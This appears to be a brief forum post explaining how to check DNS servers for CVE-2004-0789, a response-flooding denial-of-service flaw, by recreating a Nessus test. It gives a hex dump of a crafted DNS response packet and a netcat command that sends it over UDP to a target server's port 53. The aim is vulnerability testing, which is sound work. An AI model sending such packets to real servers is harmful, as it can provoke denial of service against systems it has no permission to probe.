How to test CVE-2004-0789 Multiple Vendor DNS Response Flooding Denial Of Service?
The basic Nessus test appears to be replicable by using a hex editor to create a response file ( I used the Nessus google example) and then sending that data to the target DNS server via netcat:
so:
od -ah dns-response-dos.txt
0000000 ` x enq etx nul soh nul nul nul nul nul nul etx w w w
f860 8385 0100 0000 0000 0000 7703 7777
0000020 ack g o o g l e etx c o m nul nul dle nul soh
6706 6f6f 6c67 0365 6f63 006d 1000 0100
0000040
...and then:
cat dns-response-dos.txt | nc -u "target dns server" 53
`���wwwgooglecom^C
..produces a response.
Garbage data produces no response